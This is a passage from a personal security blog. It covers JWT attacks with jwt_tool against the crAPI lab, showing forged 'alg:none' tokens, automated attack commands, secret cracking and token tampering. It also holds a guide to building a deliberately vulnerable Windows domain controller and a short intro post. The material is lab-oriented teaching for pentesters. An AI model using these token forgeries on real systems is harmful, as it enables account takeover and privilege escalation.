    jwttool_8a4cbc131e033f290781421c336d8fd6 - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJub25lIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.
    jwttool_2813749d10e5d6c29323a6692ca1f54d - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJOb25lIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.
    jwttool_5c1c85acbe085c8ae4d19f8ab95a80a8 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJOT05FIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.
    jwttool_a1d09fe0d0447b23f0c178179d023c9a - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJuT25FIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ
    

    As you can see, jwt_tool modifies the algorithm with various forms of none.

    If the server processes this token, then we don’t need to supply a valid signature. If the token doesn’t need to be signed, then we can modify it it however we want, leading to some interesting exploits.

    For example, I could change the payload’s sub value to another user’s email, or I can change my accounts role to admin.

    Now, hopefully, you see why JWT security is so important…

    Automating attacks

    Manually validating JWT attacks can be tedious. You’d have to copy-paste each modified JWT and repeat requests over and over…

    But with the -t option, you can tell jwt_tool to make the requests on your behalf:

    jwt_tool -t 'http://vulnapi:8888/identity/api/v2/user/dashboard' -rh 'Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw' -X a -np
    
    ...
    
    jwttool_5811c6f0d08e43fa738d7e2061063ed8 Exploit: "alg":"none" Response Code: 200, 184 bytes
    jwttool_ade262ee8d95d64477d4bf7f8ebbb556 Exploit: "alg":"None" Response Code: 404, 58 bytes
    jwttool_d08330cedd977600a7cb817c4a273f01 Exploit: "alg":"NONE" Response Code: 404, 58 bytes
    jwttool_61a4d6650b88610d593f5440e032cead Exploit: "alg":"nOnE" Response Code: 404, 58 bytes
    

    If the response code is 200, the attack likely worked. But, it’s best to check by making a request with another tool like curl or Burpsuite.

    Even more automation!

    Here’s where things get really interesting!

    Instead of testing exploits one by one, you can use the pb (playbook) mode to run multiple tests:

    $ jwt_tool -t 'http://vulnapi:8888/identity/api/v2/user/dashboard' -rh 'Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw' -M pb
    

    jwt_tool will then send a request to test each common exploit. It then goes even further to attempt to crack the JWT with a default wordlist. How cool is that!?

    It may be best to save the output to a file as a ton of information is returned. As with the -t parameter, successful responses can indicate potential vulnerabilities.

    Cracking JWT Secrets

    As I mentioned earlier during the pb scan, jwt_tool can crack JWT secrets.

    From earlier analysis, we know that the JWT is asymmetrically encrypted, meaning it is encrypted with a public/private key pair and not a secret phrase. So, we can’t just crack crAPI’s secret.

    But, it’s worth noting that jwt_toolhow anyways. You can specify crack mode with -C and a wordlist with -h:

    $ jwt_tool -C -d <wordlist> <JWT>

    This is relatively quick as it is an offline attack.

    But, I would save this for after you’ve exhausted common exploits.

    Tampering JWTs

    If all else fails, jwt_tool allows interactive token modification:

    $ jwt_tool -T
    
    Token header values:
    [1] alg = "RS256"
    [2] *ADD A VALUE*
    [3] *DELETE A VALUE*
    [0] Continue to next step
    
    Please select a field number:
    (or 0 to Continue)
    >

    This lets you manually modify header and payload values, useful for creative exploit attempts.

    Conclusion

    We explored JWT vulnerabilities in crAPI using jwt_tool, covering:

    • JWT structure and interception
    • Exploiting common vulnerabilities
    • Automating attacks and scanning
    • Cracking and tampering JWTs

    Understanding JWT security is essential for finding and mitigating vulnerabilities. So, I highly recommend you learn about JWTs in depth.

    Hope this post helps you on your web pentesting journey!

    Happy hunting!

  • Windows Break ‘N Build Pt. 1 – Setting Up a Vulnerable Domain Controller

    Windows Break ‘N Build Pt. 1 – Setting Up a Vulnerable Domain Controller

    Introduction

    In Part 0, we set up our lab environment by installing VirtualBox, downloading the Windows Server 2025 ISO, and configuring the virtual machine to boot from the ISO. If you haven’t completed those steps, go back to Part 0 for a full walkthrough.

    Now, in Part 1, we’ll focus on setting up the Windows Server VM as a Domain Controller (DC). This DC will serve as the foundation of our lab, where we’ll explore AD attacks and defenses. By the end of this post, you’ll have a fully operational DC we’ll eventually use for some purple-team endeavors.

    Server Installation

    Initial Configuration

    Boot the VM you configured in Part 0. You should see the Windows Server installation screen.
    If this screen doesn’t appear, revisit Part 0 to fix any issues.

      Select your preferred language and keyboard layout to proceed.

      When prompted for installation type, choose Standard Evaluation (no desktop experience). The Standard Edition supports up to two VMs, which is sufficient for our use.

      Accept the license agreement and click next (because you have no other option!).

      Use the default settings for installation location; partitioning is unnecessary for our setup.

      Let the installer run. If it fails, you may want to try increasing the allocated disk space for the VM.

      Post-Installation Steps

      After the VM reboots, you’ll be prompted to set the Administrator password. For this guide, we’ll use Password123 (remember, this is an intentionally vulnerable DC – we’re throwing security out the window)!

      Log in, then, you’ll be prompted to configure diagnostic data collection. Select Required to continue.

      Once logged in, you’ll be greeted by the sconfig menu, which simplifies server management tasks.

      Change Computer Name (Optional)

      Renaming the server can make it easier to identify in a lab with multiple VMs.

      In sconfig, select Option 2 to rename the server. For this example, use VULN-DC.

      Restart the server when prompted to apply the new name.

      Promoting the Server to a Domain Controller

      Install Active Directory Domain Services (AD DS)

      From the sconfig menu, choose Option 15 to open PowerShell.

      Install AD DS by running:

      Install-WindowsFeature -Name AD-Domain-Services 

      Ensure the VM is connected to the internet during this process. The default VirtualBox NAT connection should suffice.

        Set Up a New Forest

        Promote the server to a Domain Controller and create a new forest with the following command:

          Install-ADDSForest -DomainName "vuln.local"

          During the process, you’ll be prompted to set a Directory Services Restore Mode (DSRM) password. I used the same password as the Administrator account for simplicity. Remember, we’re sacrificing security on purpose.

          Confirm the reboot when prompted by typing Y.

          After the server restarts, verify the domain promotion. Use sconfig Option 1 to confirm that the server name reflects the new domain (e.g., vuln.local).

          By default, the server will also act as a DNS server. To confirm this, return to PowerShell and run:

          ipconfig /all

          Configure Static IP

          Setting a static IP ensures consistent communication within your lab network.

          In VirtualBox, open the VM settings.

            Navigate to the Network tab and attach a Host-Only Adapter.

            If no host-only network exists, create one via File > Tools > Network Manager.

            Inside the VM, use sconfig Option 8 to configure the network adapter.

            Then, choose the network adapter (5 in my case):

            Assign a static IP (e.g., 192.168.56.10), subnet mask (255.255.255.0), and DNS server IP (same as the server’s IP).

            Verify connectivity by pinging the static IP from your host machine.

            Adding Domain Users

            Simulate an initial compromise by creating a standard domain user.

            Open PowerShell using sconfig Option 15.

            Create a new domain user with the following command:

             net user /add <username> <password> /domain

            I created the user johnnyappleseed with password iLikeApples!

            Verify the user was created successfully: net user. Your newly created user should be listed as part of the output.

              Optional SSH Configuration

              I usually ssh into my VMs, especially if there is no GUI to interact with. It’s easier to copy-paste commands, plus, I just like my native terminal better.

              If you prefer managing the VM via SSH, follow these steps:

              Start the OpenSSH server and enable it to start automatically:

              Start-Service sshd Set-Service -Name sshd -StartupType Automatic

              Edit the SSH configuration file (C:\ProgramData\ssh\sshd_config) to enable password authentication. Use notepad.exe to modify the file:

              Locate and set PasswordAuthentication to yes.

              I went ahead and enabled public key authentication as well.

              Restart the SSH service to enable the settings:

               Restart-Service sshd

              If you’re not able to connect, make sure the firewall allows inbound SSH connections:

               Get-NetFirewallRule | Where-Object { $_.Name -like '*SSH*' }

              In my case, inbound SSH connections were allowed, but only in private networks:

              PS C:\Users\Administrator> Get-NetFirewallRule | Where-Object { $_.Name -like '*SSH*' }
              
              Name                          : OpenSSH-Server-In-TCP
              DisplayName                   : OpenSSH SSH Server (sshd)
              Description                   : Inbound rule for OpenSSH SSH Server (sshd)
              ...
              Enabled                       : True
              Profile                       : Private
              Platform                      : {}
              Direction                     : Inbound
              Action                        : Allow
              ...

              I guess the way host to guest connection through a host-only adapter counts as a Public network. Updating the rule fixed my connectivity issues:

              Set-NetFirewallRule -DisplayName "OpenSSH SSH Server (sshd)" -Profile Public

              Test the SSH connection from your host machine to the VM.

                Conclusion

                In Part 1, we set up a Windows Server VM, promoted it to a Domain Controller, created a domain user, and optionally configured SSH for easier access. This establishes a solid foundation for learning Windows AD attacks and defenses.

                Next, we’ll dive into implementing some common misconfigurations so that we can exploit them, then fix them. It’s about to get interesting so stay tuned for part 3!

              1. Welcome to my Blog!

                This being the first post, I just wanted to write a quick introduction of what
                different topics I’m going to write about and some reasons why I wanted to start
                writing my own blog. So, without further-ado, lets get into it!

                Why start a blog?

                Initially, I wanted to start a blog because I thought it would be a fun project to work on. I had just finshed working on my
                portfolio site and wanted to expand upon it, so I thought “why
                not?” I also thought it would be pretty cool to have my own blog.
                I’m not expecting many people to read it, but posting your
                thoughts to an audience as wide as the internet is a pretty
                powerful thing.

                I also want to use this blog to build on my knowledge. One of the
                best ways to learn something confidently is to teach, so I’ll be
                posting tutorials here as well.

                Main topics

                As stated earlier, the main focus of this blog will be tutorials
                that I will help me solidify my learning Daniel Messlier’s Blog
                is an excellent example of what I hope to one day achieve.

                Outside of this, I’d like to write about my experiences in my
                career and life in general. This could be in the form of career advice,
                life updates, or anything else I feel like writing about.

                This is my space where I have the freedom to post whatever I want and I
                can’t wait to share more with you!

                So, welcome to my blog and thank you for starting this journey with me :).